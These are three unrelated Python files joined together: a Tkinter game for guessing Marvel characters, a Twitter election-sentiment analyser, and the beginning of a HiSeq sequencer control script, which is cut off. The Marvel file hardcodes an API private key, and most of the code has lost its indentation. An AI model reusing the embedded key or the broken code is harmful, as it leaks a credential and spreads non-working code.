GUI Super Wonder Captain V4.2.py
# GUI Super Wonder Captain.py
#
import io # In-memory byte streams (used to load images fetched over HTTP)
import datetime # Date and time handling for scores
import hashlib # MD5 hashes for Marvel API authentication
import json # Parse JSON responses from the Marvel API
import os # Miscellaneous operating system interfaces
import pickle # Serializing and de-serializing of Python object structures
import random # Random character selection
import requests # HTTP requests to the Marvel API
import time # Time access and conversions
import threading # Background thread for building the character list
totalscore = 0
wordcount = 0
remaningpoints = 25
hintsleft = True
addpoints = True
from tkinter import * # Tkinter GUI for Python 3.X
from tkinter import messagebox # Tkinter messagebox
from PIL import Image, ImageTk # Allows for image formats other than gif
from urllib.request import urlopen # Opens URLs (used to fetch character images)
def getHighScore():
try:
file = open("scores.txt", "r")
names = []
scores = []
highscores = ""
for line in file:
currentline = line.split(",")
name = currentline[0].replace("\n", "").split("\n")
names.append(name)
score = currentline[1].replace("\n", "").split("\n")
scores.append(score)
for n, s in zip(names, scores):
highscores += "\n" + "".join(n) + ": " + "".join(s)
return highscores
except:
return ""
def getTodaysHighScore():
try:
name = ""
highscore = 0
file = open("scores.txt", "r")
for line in file:
line = line.split(",")
times = line[2].replace("\n", "").split("\n") #stores the times of the scores in scores.txt
file.close()
file = open("scores.txt", "r")
for line in file:
if str(datetime.date.today()) in line: #checks for each date if it matches today's date
line = line.split(",")
scores = line[1].replace("\n", "").split("\n") #stores today's scores
for score in scores:
if int(score) > highscore:
highscore = int(score) #assigns the highest score to highscore variable
file.close()
file = open("scores.txt", "r")
for line in file:
if str(highscore) in line: #matches the highscore to the line in which it occurs
line = line.split(",")
name = line[0].replace("\n", "").split("\n") #stores the name of the scores in scores.txt
return "".join(name) + ": " + str(highscore)
except:
return ""
def sendScoreToFile():
global totalscore
if totalscore < 0: #if totalscore is smaller than 0, there are no points to be scored anymore
totalscore = 0
file = open("scores.txt", "a") #open scores.txt in append mode
output = nameVar.get() + "," + str(totalscore) + "," + str(datetime.date.today())
file.write(output + "\n") #writes to scores.txt the name of player, the score and today's date
file.close()
def correctAnswer():
global totalscore
global remaningpoints
totalscore += 25 #correct answer
remaningpoints = 0
Scores(root)
def falseAnswer():
global totalscore
global remaningpoints
totalscore -= 1 #wrong answer
if remaningpoints < 1:
remaningpoints = 0
else:
remaningpoints -= 1
Scores(root)
def giveHint():
global totalscore
global remaningpoints
totalscore -= 3 #hint
if remaningpoints < 3: #ensures that the remaining points do not go lower than 0
remaningpoints = 0
elif hintsleft:
remaningpoints -= 3
Scores(root)
def play():
global hintsleft
hintsleft = True
if nameVar.get() == "":
messagebox.showerror("Error", "Please enter a name and press play!")
else:
global wordcount, randomcharacters, remaningpoints
hintsleft = True
wordcount = 0
randomcharacters = getrndchars(getcharlist())
Characters(root)
Description(root)
remaningpoints = 25
Scores(root)
def hint():
giveHint()
Description(root)
def giveUP():
global remaningpoints
remaningpoints = 0
messagebox.showwarning("Warning", "Nope!!")
Scores(root)
def charButtons(i):
    global addpoints
    global totalscore
    global remaningpoints
    # All ten character buttons share the same logic, so a single index check
    # replaces the original if/elif chain over i == 0 ... i == 9 (behaviour unchanged).
    if nameofchartoguess == randomcharacters[0][i]:
        addpoints = False
        messagebox.showinfo("Correct!", "Congratulations!!!")
        correctAnswer()
        sendScoreToFile()
        totalscore = 0
        play()
    else:
        falseAnswer()
def exit():
# Put here everything you want to close by exit
root.destroy()
def info():
messagebox.showinfo("Made by", "Game developed by Azzeddine, Abdel, Glenn, Kamal, Laurens & Sem")
def rules():
messagebox.showinfo("Rules...", "You start with 25 points\n"
"If you press the wrong character button you lose 1 point\n"
"If you press the hint button you lose 3 points\n"
"If you press the giveup button you lose all points\n"
"Have fun playing this game!")
class Initialize:
def __init__(self, master):
master.resizable(0, 0)
master.title("Super Wonder Captain")
master.wm_iconbitmap('Marvel.ico')
global background_image
background_image = PhotoImage(file="Background.png")
background_label = Label(master, image=background_image)
background_label.place(x=0, y=0, relwidth=1, relheight=1)
global w, h
w = background_image.width()
h = background_image.height()
master.geometry('%dx%d+0+0' % (w, h))
menubar = Menu(master)
master.config(menu=menubar)
gameMenu = Menu(menubar)
menubar.add_cascade(label="Game...", menu=gameMenu)
gameMenu.add_command(label="Play!!", command=play)
gameMenu.add_separator()
gameMenu.add_command(label="Exit", command=exit)
helpMemu = Menu(menubar)
menubar.add_cascade(label="Help", menu=helpMemu)
helpMemu.add_command(label="Rules", command=rules)
helpMemu.add_command(label="Info", command=info)
statusBarFrame = Frame(master)
statusBarFrame.pack(side=BOTTOM, fill=X)
self.statusBar = Label(statusBarFrame, text="Data provided by Marvel. © 2014 Marvel", bd=1, relief=SUNKEN)
self.statusBar.pack(side=LEFT, fill=X)
global progress
progress = StringVar()
self.status = Label(statusBarFrame, textvariable=progress, bd=1, relief=SUNKEN)
self.status.pack(side=RIGHT, fill=X)
class User:
def __init__(self, master):
# frame specs
userFrame = Frame(master)
#userFrame.pack(anchor=NW)
userFrame.place(x=5, y=10)
# label name for entry field
self.label = Label(userFrame, text="Name")
self.label.grid(row=0, column=0, sticky=E)
global nameVar
nameVar = StringVar() # String variable
# Entry field
self.name = Entry(userFrame, textvariable=nameVar)
self.name.grid(row=0, column=1)
class Buttons:
def __init__(self, master):
# frame specs
buttonFrame1 = Frame(master)
buttonFrame1.place(x=5, y=35)
# Buttons
#global playButton, exitButton
self.playButton = Button(buttonFrame1, text='Play', command=play, height=2, width=10)
self.playButton.grid(row=0, column=0, sticky=W)
#self.playButton.config(state=DISABLED)
self.exitButton = Button(buttonFrame1, text='Exit', command=exit, height=2, width=10)
self.exitButton.grid(row=0, column=1, padx=5, sticky=E)
#self.exitButton.config(state=DISABLED)
class Scores:
def __init__(self, master):
scoreFrame = Frame(master) # select of names
#scoreFrame.pack(anchor=NE)
scoreFrame.place(x=w, y=0, anchor=NE)
labelFrame = Frame(master)
labelFrame.place(x=w-130, y=0, anchor=NE)
labelHS = Label(labelFrame, text=" Highscores: ", font=("Helvetica", 10))
labelHS.grid(row=0, column=2, sticky=E)
scroll = Scrollbar(scoreFrame, orient=VERTICAL)
text = Text(scoreFrame, height=10, width=15, font=("Helvetica", 10))
scroll.config(command=text.yview)
text.config(yscrollcommand=scroll.set)
scroll.pack(side=RIGHT, fill=Y)
text.pack(side=LEFT, fill=BOTH, expand=1)
text.insert(END, getHighScore())
text.configure(state=DISABLED)
labelTS = Label(labelFrame, text="Today highscore: ", font=("Helvetica", 10))
labelTS.grid(row=0, column=0, sticky=E)
textTS = Text(labelFrame, height=1, width=15, font=("Helvetica", 10))
textTS.grid(row=0, column=1, sticky=E)
textTS.insert(END, getTodaysHighScore())
textTS.configure(state=DISABLED)
labelRP = Label(labelFrame, text="Remaining points: ", font=("Helvetica", 10))
labelRP.grid(row=1, column=0, sticky=E)
textRP = Text(labelFrame, height=1, width=15, font=("Helvetica", 10))
textRP.grid(row=1, column=1, sticky=E)
textRP.insert(END, remaningpoints)
textRP.configure(state=DISABLED)
class Description:
def __init__(self, master):
# frame specs
QuestionFrame = Frame(master)
QuestionFrame.place(x=w/2, y=(200), anchor=S)
DiscriptionFrame = Frame(master)
DiscriptionFrame.place(x=w/2, y=(h/2-20), anchor=S)
Question = Label(QuestionFrame, text="Choose a character by this description", font=("Helvetica", 16))
Question.grid(row=0, column=0)
Appels = givehint(randomcharacters)
scroll = Scrollbar(DiscriptionFrame, orient=VERTICAL)
text = Text(DiscriptionFrame, height=5, width=80, font=("Helvetica", 12))
scroll.config(command=text.yview)
text.config(yscrollcommand=scroll.set)
scroll.pack(side=RIGHT, fill=Y)
text.pack(side=LEFT, fill=BOTH, expand=1)
if Appels != "ok" and Appels != "":
text.insert(END, Appels[1])
text.configure(state=DISABLED)
class Characters:
def __init__(self, master):
characterFrame = Frame(master)
characterFrame.place(x=(w/2), y=h/2, anchor=N)
global image
image = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
for i in image:
image[i] = self.loadPic(getcharlist().get(randomcharacters[0][i])[1])
self.label = Label(characterFrame, text=randomcharacters[0][i][:15])
self.label.grid(row=0, column=i)
self.character = Button(characterFrame, image=image[i], command=lambda i=i: charButtons(i))
self.character.grid(row=1, column=i)
buttonFrame = Frame(master)
buttonFrame.place(x=w/2, y=h-100, anchor=S)
self.hintButton = Button(buttonFrame, text='Hint!', command=hint, height=3, width=15)
self.hintButton.grid(row=0, column=0, sticky=W)
self.giveUpButton = Button(buttonFrame, text='Give up!', command=giveUP, height=3, width=15)
self.giveUpButton.grid(row=0, column=1, sticky=E)
def loadPic(self, url):
image_bytes = urlopen(url).read()
# internal data file
data_stream = io.BytesIO(image_bytes)
# open as a PIL image object
pil_image = Image.open(data_stream)
# convert PIL image object to Tkinter PhotoImage object
pil_image = pil_image.resize((100, 100), Image.ANTIALIAS)
# PIL resize takes (width, height); the thumbnails are shown at 100 x 100
return ImageTk.PhotoImage(pil_image)
def loadScreen(x):
if x > 100:
progress.set("Building completed! {} characters loaded".format(str(x)))
#playButton.config(state=NORMAL)
#exitButton.config(state=NORMAL)
else:
progress.set("Building character-list; 100 needed: {}".format(str(x)))
# This function will check if there is an up-to-date file with all the character data.
# If there isn't one, this function will create or update the file.
def getcharlist():
# Try to get the file modified date. If it's equal to the system date, open the file and return its content.
# If it's not, or the file doesn't exist, create or update it. Then open it and return its content.
try:
if str(datetime.datetime.fromtimestamp(os.path.getmtime('characters.pck'))).split()[0] == time.strftime("%Y-%m-%d"):
build = False
else:
build = True
except OSError:
build = True
if build:
characterlist = {} # Will hold the information of 100+ characters.
offset = 0 # Will be used to get the next set of 100 characters.
# Connection information.
baseurl = "http://gateway.marvel.com:80/v1/public/characters"
private_key = "ac844ec2eeadb045d5a099248aaad6b0ba944448"
public_key = "01e99d019cdb13d44f3ec962cd0b04ad"
# Keep asking for 100 more until we have a list of 100+ characters that meets our criteria.
while len(characterlist) < 100:
# Build the connection URL.
timestamp = str(time.time())
hash = hashlib.md5( (timestamp+private_key+public_key).encode('utf-8') )
md5digest = str(hash.hexdigest())
connection_url = baseurl + "?ts=" + timestamp + "&limit=100&offset=" + str(offset) + "&apikey=" + public_key + "&hash=" + md5digest
# Get the information
response = requests.get(connection_url)
jsontext = json.loads(response.text)
# Stop if we get an empty list of characters
if len(jsontext['data']['results']) == 0:
break
# Add 100 to the offset so we'll get the next 100 characters next time instead of the same ones.
offset += 100
# Read all the 100 characters we got from the response.
# If one meets our criteria, we can harvest the information we need and add this character to our list.
for item in jsontext['data']['results']:
if len(item['description']) > 25 and item['thumbnail']['path'][-19:] != "image_not_available":
characterlist[item['name']] = [item['description'], item['thumbnail']['path'] + "." + item['thumbnail']['extension']]
loadScreen(len(characterlist)) # Indication of how many characters we already have.
# Open/create the file 'characters.pck' and store our characterlist.
with open('characters.pck', 'wb') as picklefile:
pickle.dump(characterlist, picklefile)
# Return the characterlist so other functions can use it.
return characterlist
else:
# Open the file 'characters.pck' and read its content.
with open('characters.pck', 'rb') as picklefile:
characterlist = pickle.load(picklefile)
loadScreen(len(characterlist)) # Indication of how many characters we have.
# Return the characterlist so other functions can use it.
return characterlist
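# Note (added for clarity): the request above follows the Marvel API authentication
# scheme, sending ts, apikey and hash = md5(ts + private_key + public_key) as query
# parameters. The resulting dictionary has the form
#   {character_name: [description, thumbnail_url], ...}
# and is cached in characters.pck, then reused for the rest of the day.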
# This function will get ten random character names from the masterlist.
# Then it will pick a random character of those ten and get its description.
# The description will then be altered so the name of the character won't appear in the hints.
def getrndchars(characterlist):
rndnames = [] # Will hold ten random character names.
chartoguess = [] # Will hold the character data of the character that has to be guessed.
texttoremove = [] # Will hold the names of the character that has to be guessed.
# Pick a random character from the masterlist until we have ten.
while len(rndnames) < 10:
name = random.choice(list(characterlist.keys()))
# Be sure the random name we picked is not already in the list. Add it if it isn't.
if name not in rndnames:
rndnames.append(name)
# Pick a random name from the list of ten names we just built and add it to a list.
global nameofchartoguess
nameofchartoguess = random.choice(rndnames)
chartoguess.append(nameofchartoguess)
# Get all the details we need of the character from the masterlist and add this to the list.
chartoguess.append(characterlist.get(nameofchartoguess))
# Split the name of the character.
texttoremove = str.split(nameofchartoguess)
# Replace all occurrences of the character's name in the description with '...'
for key in texttoremove:
chartoguess[1][0] = chartoguess[1][0].replace(key, '...')
# Split the characters description.
chartoguess[1][0] = str.split(chartoguess[1][0])
# Return the ten random names and the character that has to be guessed.
return rndnames, chartoguess
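# Note (added for clarity): getrndchars() returns a 2-tuple, e.g.
#   rndnames, chartoguess = getrndchars(getcharlist())
# where rndnames is a list of ten character names and chartoguess is
#   [name_to_guess, [description_word_list, thumbnail_url]]
# givehint() below receives the whole 2-tuple, which is why it indexes
# chartoguess[1][1][0] to reach the description word list.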
# This function will return a part of the description of the character that has to be guessed.
def givehint(chartoguess):
global wordcount
wordcount += 10 # Number of words of the description already revealed.
# Return ten more words from the description if there are still words left
if wordcount < (len(chartoguess[1][1][0]) + 10):
hint = "{0}".format(" ".join(str(i) for i in chartoguess[1][1][0][:wordcount]))
return 'Here is your hint: ', hint
else:
global hintsleft
hintsleft = False
return messagebox.showinfo("Sorry", "Sorry out of hints!"), chartoguess[1][1][0]
def main():
global root
root = Tk()
Initialize(root)
User(root)
Buttons(root)
threading.Thread(target=getcharlist).start()
root.mainloop()
if __name__ == "__main__":
main()
twitter_sentiment_election.py
import threading
import json
from time import sleep
import twitter
from nltk.sentiment.vader import SentimentIntensityAnalyzer
# Define Twitter OAuth credentials.
CONSUMER_KEY = "CONSUMER_KEY"
CONSUMER_SECRET = "CONSUMER_SECRET"
ACCESS_TOKEN = "ACCESS_TOKEN"
ACCESS_TOKEN_SECRET = "ACCESS_TOKEN_SECRET"
# Define search language and keywords for stream
LANGUAGES = ['en']
SEARCH_TERMS = ["GE2017", "GeneralElection", "Labour", "Conservatives", "Lib Dems", "SNP", "Theresa May",
"Tim Farron", "Corbyn", "Liberal Democrats", "GE", "GE17", "Farron", "Scottish National Party",
"election"]
# Define keywords for determining which party each tweet discusses
CON_WORDS = ["conservatives", "tory", "tories", "conservative", "theresa may", "may", "theresa"]
LAB_WORDS = ["labour", "lab", "jeremy corbyn", "corbyn"]
LIB_WORDS = ["lib dem", "lib dems", "lib", "liberal", "democrats", "farron"]
SNP_WORDS = ["snp", "nicola sturgeon", "scottish national party", "sturgeon"]
def get_tweets(tweets):
"""
Connects to the Twitter API using python-twitter and starts a stream connection based on the keywords provided.
Takes as input a list of tweets and adds to it.
Tweets are preferred in their extended (not truncated) form.
"""
api = twitter.Api(consumer_key=CONSUMER_KEY,
consumer_secret=CONSUMER_SECRET,
access_token_key=ACCESS_TOKEN,
access_token_secret=ACCESS_TOKEN_SECRET,
tweet_mode='extended',
sleep_on_rate_limit=True)
for line in api.GetStreamFilter(track=SEARCH_TERMS, languages=LANGUAGES):
try:
if line['truncated']:
tweets.append(line['extended_tweet']['full_text'].rstrip('\r\n'))
else:
tweets.append(line['text'].rstrip('\r\n'))
except KeyError as e:
print("Malformed/unexpected JSON - likely a truncated tweet.")
print(e)
return tweets
def get_tweet_sentiment(tweets):
"""
Uses the VADER SentimentIntensityAnalyzer from NLTK to classify tweet sentiment polarity.
Takes as input a list of tweets (text-only, not JSON).
Checks which party a tweet refers to and averages the score for all tweets for each party.
Returns a dictionary of the parties and their average sentiment score (compound).
"""
scores = {"con": [], "lab": [], "lib": [], "snp": []}
averages = {"con": [], "lab": [], "lib": [], "snp": []}
sid = SentimentIntensityAnalyzer()
for tweet in tweets:
ss = sid.polarity_scores(tweet.replace("#", "")) # get the sentiment analysis scores for each tweet
c_score = ss['compound'] # take the compound score, between -1 and 1
if any(word in tweet.lower() for word in CON_WORDS):
scores['con'].append(c_score)
if any(word in tweet.lower() for word in LAB_WORDS):
scores['lab'].append(c_score)
if any(word in tweet.lower() for word in LIB_WORDS):
scores['lib'].append(c_score)
if any(word in tweet.lower() for word in SNP_WORDS):
scores['snp'].append(c_score)
for party, score_list in scores.items():
if len(score_list) != 0:
average = sum(score_list)/len(score_list) # average sentiment per party per tweet
else:
average = 0
averages[party] = average
return averages
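# Illustrative usage (added; assumes the VADER lexicon has been downloaded with
# nltk.download('vader_lexicon')). Party keywords are matched case-insensitively,
# and parties with no matching tweets keep an average of 0:
#
#   get_tweet_sentiment(["I love Corbyn", "Theresa May was terrible today"])
#   # -> roughly {'con': <negative compound>, 'lab': <positive compound>, 'lib': 0, 'snp': 0}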
def save_scores(scores_dict):
"""
Saves the scores in a dictionary to a JSON file to be read by the website wrapper.
"""
total = 0
for party, score in scores_dict.items():
    total += abs(score)
if total == 0:  # if no sentiment yet, set 25% as the default width on the page
    scores_dict.update({party: .25 for party in scores_dict})
else:
    scores_dict.update({party: score * (1 / total) for party, score in scores_dict.items()})
with open('scores.json', 'w') as f:  # write the JSON to file (overwriting previous)
    json.dump(scores_dict, f)
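# Illustrative result (added; the input values are hypothetical): with
#   {'con': -0.2, 'lab': 0.3, 'lib': 0.1, 'snp': 0.0}
# the scores are rescaled by 1/sum(|score|) = 1/0.6, so scores.json would contain
#   {"con": -0.333..., "lab": 0.5, "lib": 0.166..., "snp": 0.0}
# and if every score is 0 each party defaults to 0.25.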
if __name__ == "__main__":
"""
Analyses General Election Tweet Sentiment using VADER with NLTK.
Author: Xav Kearney
April 23rd 2017
Live Version: http://xavkearney.com/sentiment
Requirements:
https://github.com/bear/python-twitter
http://www.nltk.org/ with VADER lexicon.
"""
tweet_list = []
tweet_stream = threading.Thread(target=get_tweets, args=(tweet_list,))
tweet_stream.start()
moving_averages = {"con": [], "lab": [], "lib": [], "snp": []}
current_scores = {"con": [], "lab": [], "lib": [], "snp": []}
while True:
sleep(2) # takes approx 2s to get a reasonable number of tweets
averages = get_tweet_sentiment(tweet_list) # get the average sentiment per tweet
for party, score in averages.items():
if len(moving_averages[party]) > 4: # cap the moving-average window (keeps the last five scores)
del moving_averages[party][-1]
moving_averages[party].insert(0, score)
current_scores[party] = sum(moving_averages[party])/len(moving_averages[party])
print("Current party scores: ".format(current_scores))
save_scores(current_scores)
if len(tweet_list) > 1000:
tweet_list.clear()
print("Reset the tweet list.")
main.py
"""
TODO:
"""
import time
import logging
import os
from os.path import join
import sys
import configparser
import threading
import argparse
from . import methods
from . import args
from . import focus
# Global int to track # of errors during start up
n_errors = 0
def error(*args):
"""Keep count of errors and print to logger and/or console."""
global n_errors
i = 0
if isinstance(args[0], logging.Logger):
logger = args[0]
i = 1
msg = 'ERROR::'
for a in args[i:]:
msg = msg + str(a) + ' '
if i == 0:
print(msg)
else:
logger.log(21, msg)
n_errors += 1
return n_errors
##########################################################
## Flowcell Class ########################################
##########################################################
class Flowcell():
"""HiSeq 2500 System :: Flowcell
**Attributes:**
- position (str): Flowcell is at either position A (left slot )
or B (right slot).
- recipe_path (path): Path to the recipe.
- recipe (file): File handle for the recipe.
- first_line (int): Line number for the recipe to start from on the
initial cycle.
- cycle (int): The current cycle.
- total_cycles (int): Total number of the cycles for the experiment.
- history ([[int,],[str,],[str,]]): Timeline of flowcell events, the
1st column is the timestamp, the 2nd column is the event, and the
3rd column is an event specific detail.
- sections (dict): Dictionary of section names keys and coordinate
positions of the sections on the flowcell values.
- stage (dict): Dictionary of section names keys and stage positioning
and imaging details of the sections on the flowcell values.
- thread (int): Thread id of the current event on the flowcell.
- signal_event (str): Event that signals the other flowcell to continue
- wait_thread (threading.Event()): Blocks other flowcell until current
flowcell reaches signal event.
- waits_for (str): Flowcell A waits for flowcell B and vice versa.
- pump_speed (dict): Dictionary of pump scenario keys and pump speed
values.
- volume (dict): Keys are events/situations and values are volumes
in uL to use at the event/situation.
- filters (dict): Dictionary of filter set at each cycle, c: em, ex1, ex2.
- IMAG_counter (None/int): Counter for multiple images per cycle.
- events_since_IMAG (list): Record events since last IMAG step.
- temp_timer: Timer to check temperature of flowcell.
- temperature (float): Set temperature of flowcell in °C.
- temp_interval (float): Interval in seconds to check flowcell temperature.
- z_planes (int): Override number of z planes to image in recipe.
- pre_recipe_path (path): Recipe to run before actually starting experiment
- pre_recipe (file): File handle for the pre recipe.
"""
def __init__(self, position):
"""Constructor for flowcells
**Parameters:**
- position (str): Flowcell is at either position A (left slot) or
B (right slot).
"""
self.recipe_path = None
self.recipe = None
self.first_line = None
self.cycle = 0 # Current cycle
self.total_cycles = 0 # Total number of cycles for experiment
self.history = [[],[],[]] # summary of events in flowcell history
self.sections = {} # coordinates of flowcell of sections to image
self.stage = {} # stage positioning info for each section
self.thread = None # threading to do parallel actions on flowcells
self.signal_event = None # defines event that signals the next flowcell to continue
self.wait_thread = threading.Event() # blocks next flowcell until current flowcell reaches signal event
self.waits_for = None # position of the flowcell that signals current flowcell to continue
self.pump_speed = {}
self.volume = {'main':None,'side':None,'sample':None,'flush':None} # Flush volume
self.filters = {} # Dictionary of filter set at each cycle, c: em, ex1, ex2
self.IMAG_counter = None # Counter for multiple images per cycle
self.events_since_IMAG = [] # List events since last IMAG step
self.temp_timer = None # Timer to check temperature of flowcell
self.temperature = None # Set temperature of flowcell
self.temp_interval = None # Interval in seconds to check flowcell temperature
self.z_planes = None # Override number of z planes to image in recipe.
self.pre_recipe_path = None # Recipe to run before actually starting experiment
while position not in ['A', 'B']:
print('Flowcell must be at position A or B')
position = input('Enter A or B for ' + str(position) + ' : ')
self.position = position
def addEvent(self, event, command):
"""Record history of events on flow cell.
**Parameters:**
- instrument (str): Type of event can be valv, pump, hold, wait, or
imag.
- command (str): Details specific to each event such as hold time,
buffer, event to wait for, z planes to image, or pump volume.
**Returns:**
- int: A time stamp of the last event.
"""
self.history[0].append(time.time()) # time stamp
self.history[1].append(event) # event (valv, pump, hold, wait, imag)
self.history[2].append(command) # details such hold time, buffer, event to wait for
self.events_since_IMAG.append(event)
if event == 'PORT':
self.events_since_IMAG.append(command)
if event in ['IMAG', 'STOP']:
self.events_since_IMAG.append(event)
return self.history[0][-1] # return time stamp of last event
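# Illustrative usage (added; 'PUMP' and 'water' are example values):
#   t = fc.addEvent('PUMP', 'water')   # records the event and returns its time stamp
# where fc is a Flowcell instance.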
def restart_recipe(self):
"""Restarts the recipe and returns the number of completed cycles."""
# Restart recipe
if self.recipe is not None:
self.recipe.close()
self.recipe = open(self.recipe_path)
# Reset image counter (if multiple images per cycle)
if self.IMAG_counter is not None:
self.IMAG_counter = 0
msg = 'PySeq::'+self.position+'::'
if self.cycle == self.total_cycles:
# Increase cycle counter
self.cycle += 1
# Flowcell completed all cycles
hs.message(msg+'Completed '+ str(self.total_cycles) + ' cycles')
hs.T.fc_off(self.position)
self.temperature = None
do_rinse(self)
if self.temp_timer is not None:
self.temp_timer.cancel()
self.temp_timer = None
self.thread = threading.Thread(target = time.sleep, args = (10,))
elif self.cycle < self.total_cycles:
# Increase cycle counter
self.cycle += 1
# Start new cycle
restart_message = msg+'Starting cycle '+str(self.cycle)
self.thread = threading.Thread(target = hs.message,
args = (restart_message,))
else:
self.thread = threading.Thread(target = time.sleep, args = (10,))
thread_id = self.thread.start()
return self.cycle
def pre_recipe(self):
"""Initializes pre recipe before starting experiment."""
prerecipe_message = 'PySeq::'+self.position+'::'+'Starting pre recipe'
self.recipe = open(self.prerecipe_path)
self.thread = threading.Thread(target = hs.message,
args = (prerecipe_message,))
thread_id = self.thread.start()
return thread_id
def endHOLD(self):
"""Ends hold for incubations in buffer, returns False."""
msg = 'PySeq::'+self.position+'::cycle'+str(self.cycle)+'::Hold stopped'
hs.message(msg)
return False
##########################################################
## Setup Flowcells #######################################
##########################################################
def setup_flowcells(first_line, IMAG_counter):
"""Read configuration file and create flowcells.
**Parameters:**
- first_line (int): Line number for the recipe to start from on the
initial cycle.
**Returns:**
- dict: Dictionary of flowcell position keys with flowcell object values.
"""
err_msg = 'ConfigFile::sections::'
experiment = config['experiment']
method = experiment['method']
method = config[method]
flowcells = {}
for sect_name in config['sections']:
f_sect_name = sect_name.replace('_','') #remove underscores
position = config['sections'][sect_name]
AorB, coord = position.split(':')
# Create flowcell if it doesn't exist
if AorB not in flowcells.keys():
fc = Flowcell(AorB)
fc.recipe_path = experiment['recipe path']
fc.first_line = first_line
fc.volume['main'] = int(method.get('main prime volume', fallback=500))
fc.volume['side'] = int(method.get('side prime volume', fallback=350))
fc.volume['sample'] = int(method.get('sample prime volume', fallback=250))
fc.volume['flush'] = int(method.get('flush volume', fallback=1000))
fs = int(method.get('flush flowrate',fallback=700))
fc.pump_speed['flush'] = fs
ps = int(method.get('prime flowrate',fallback=100))
fc.pump_speed['prime'] = ps
rs = int(method.get('reagent flowrate', fallback=40))
fc.pump_speed['reagent'] = rs
fc.total_cycles = int(config.get('experiment','cycles'))
fc.temp_interval = float(method.get('temperature interval', fallback=5))*60
z_planes = int(method.get('z planes', fallback=0))
if z_planes > 0:
fc.z_planes = z_planes
if IMAG_counter > 1:
fc.IMAG_counter = 0
fc.prerecipe_path = method.get('pre recipe', fallback = None)
flowcells[AorB] = fc
# Add section to flowcell
if sect_name in flowcells[AorB].sections:
error(err_msg, sect_name, 'duplicated on flowcell', AorB)
else:
coord = coord.split(',')
flowcells[AorB].sections[f_sect_name] = [] # List to store coordinates of section on flowcell
flowcells[AorB].stage[f_sect_name] = {} # Dictionary to store stage position of section on flowcell
if float(coord[0]) < float(coord[2]):
error(err_msg,'Invalid x coordinates for', sect_name)
if float(coord[1]) < float(coord[3]):
error(err_msg, 'Invalid y coordinates for', sect_name)
for i in range(4):
try:
flowcells[AorB].sections[f_sect_name].append(float(coord[i]))
except:
error(err_msg,' No position for', sect_name)
# if running multiple flowcells...
# Define first flowcell
# Define prior flowcell signals to next flowcell
if len(flowcells) > 1:
flowcell_list = [*flowcells]
for fc in flowcells.keys():
flowcells[fc].waits_for = flowcell_list[
flowcell_list.index(fc)-1]
if experiment['first flowcell'] not in flowcells:
error('ConfigFile::First flowcell does not exist')
if isinstance(IMAG_counter, int):
error('Recipe::Need WAIT before IMAG with 2 flowcells.')
# table = {}
# for fc in flowcells:
# table[fc] = flowcells[fc].sections.keys()
# print('Flowcell section summary')
# print(tabulate.tabulate(table, headers = 'keys', tablefmt = 'presto'))
#
# userYN('Confirm flowcell(s)')
return flowcells
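# Illustrative config snippet (added; the section name and coordinates are hypothetical):
#   [sections]
#   section1 = A:15.5,45.0,10.5,35.0
# i.e. flowcell position 'A' or 'B' followed by four comma-separated coordinates,
# where coord[0] >= coord[2] and coord[1] >= coord[3] (otherwise an error is logged).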
##########################################################
## Parse lines from recipe ###############################
##########################################################
def parse_line(line):
"""Parse line and return event (str) and command (str).
If line starts with the comment character, #, then None is return for
both event and command.
"""
comment_character = '#'
#delimiter = '\t'
no_comment = line.split(comment_character)[0] # remove comment
sections = no_comment.split(':')
if len(sections) == 2:
event = sections[0].strip() # first section is event
event = event[0:4] # event identified by first 4 characters
command = sections[1] # second section is command
command = command.strip() # remove space
else:
event = None
command = None
return event, command
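# Added illustration of parse_line on the "EVENT: command" recipe format
# (anything after '#' is dropped; only the first four characters of the event are kept):
#   parse_line('PORT: water  # wash buffer')  ->  ('PORT', 'water')
#   parse_line('# full-line comment')         ->  (None, None)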
##########################################################
## Setup Logging #########################################
##########################################################
def setup_logger():
"""Create a logger and return the handle."""
# Get experiment info from config file
experiment = config['experiment']
experiment_name = experiment['experiment name']
# Make directory to save data
save_path = join(experiment['save path'],experiment_name)
if not os.path.exists(save_path):
os.mkdir(save_path)
# Make directory to save logs
log_path = join(save_path, experiment['log path'])
if not os.path.exists(log_path):
os.mkdir(log_path)
# Create a custom logger
logger = logging.getLogger(__name__)
logger.setLevel(10)
# Create console handler
c_handler = logging.StreamHandler()
c_handler.setLevel(21)
# Create file handler
f_log_name = join(log_path,experiment_name + '.log')
f_handler = logging.FileHandler(f_log_name)
f_handler.setLevel(logging.INFO)
# Create formatters and add it to handlers
c_format = logging.Formatter('%(asctime)s - %(message)s', datefmt = '%Y-%m-%d %H:%M')
f_format = logging.Formatter('%(asctime)s - %(message)s')
c_handler.setFormatter(c_format)
f_handler.setFormatter(f_format)
# Add handlers to the logger
logger.addHandler(c_handler)
logger.addHandler(f_handler)
# Save copy of config with log
config_path = join(log_path,'config.cfg')
with open(config_path, 'w') as configfile:
config.write(configfile)
return logger
def configure_instrument(IMAG_counter, port_dict):
"""Configure and check HiSeq settings."""
global n_errors
model, name = methods.get_machine_info(args_['virtual'])
if model is not None:
config['experiment']['machine'] = model+'::'+name
experiment = config['experiment']
method = experiment['method']
method = config[method]
try:
total_cycles = int(experiment.get('cycles'))
except:
error('ConfigFile:: Cycles not specified')
# Create HiSeq Object
if model == 'HiSeq2500':
if args_['virtual']:
from . import virtualHiSeq
hs = virtualHiSeq.HiSeq(name, logger)
hs.speed_up = int(method.get('speed up', fallback = 5000))
else:
import pyseq
com_ports = pyseq.get_com_ports()
hs = pyseq.HiSeq(name, logger)
else:
sys.exit()
# Check side ports
try:
side_ports = method.get('side ports', fallback = '9,21,22,23,24')
side_ports = side_ports.split(',')
side_ports = list(map(int, side_ports))
except:
error('ConfigFile:: Side ports not valid')
# Check sample port
try:
sample_port = int(method.get('sample port', fallback = 20))
except:
error('ConfigFile:: Sample port not valid')
# Check barrels per lane make sense:
n_barrels = int(method.get('barrels per lane', fallback = 1)) # Get method specific pump barrels per lane, fallback to 1
if n_barrels not in [1,2,4,8]:
error('ConfigFile:: Barrels per lane must be 1, 2, 4 or 8')
# Check inlet ports, note switch inlet ports in initialize_hs
inlet_ports = int(method.get('inlet ports', fallback = 2))
if inlet_ports not in [2,8]:
error('MethodFile:: inlet ports must be 2 or 8.')
variable_ports = method.get('variable reagents', fallback = None)
hs.z.image_step = int(method.get('z position', fallback = 21500))
hs.overlap = abs(int(method.get('overlap', fallback = 0)))
hs.overlap_dir = method.get('overlap direction', fallback = 'left').lower()
if hs.overlap_dir not in ['left', 'right']:
error('MethodFile:: overlap direction must be left or right')
